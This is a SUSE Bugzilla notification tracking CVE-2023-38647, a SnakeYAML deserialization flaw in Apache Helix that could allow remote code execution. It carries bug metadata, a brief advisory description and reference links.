https://bugzilla.suse.com/show_bug.cgi?id=1213660 Bug ID: 1213660 Summary: VUL-0: CVE-2023-38647: helix: Deserialization vulnerability in Helix workflow and REST Classification: openSUSE Product: openSUSE Distribution Version: Leap 15.5 Hardware: Other URL: https://smash.suse.de/issue/373380/ OS: Other Status: NEW Severity: Normal Priority: P5 - None Component: Other Assignee: socvirnyl.estela@gmail.com Reporter: gianluca.gabrielli@suse.com QA Contact: qa-bugs@suse.de Target Milestone: --- Found By: --- Blocker: --- Posted by Junkai Xue on Jul 25Severity: important Affected versions: - Apache Helix through 1.2.0 Description: An attacker can use SnakeYAML to deserialize java.net.URLClassLoader and make it load a JAR from a specified URL, and then deserialize javax.script.ScriptEngineManager to load code using that ClassLoader. This unbounded deserialization can likely lead to remote code execution. The code can be run in Helix REST start and Workflow creation. Affect all the... References: http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2023-38647 https://seclists.org/oss-sec/2023/q3/73 -- You are receiving this mail because: You are on the CC list for the bug.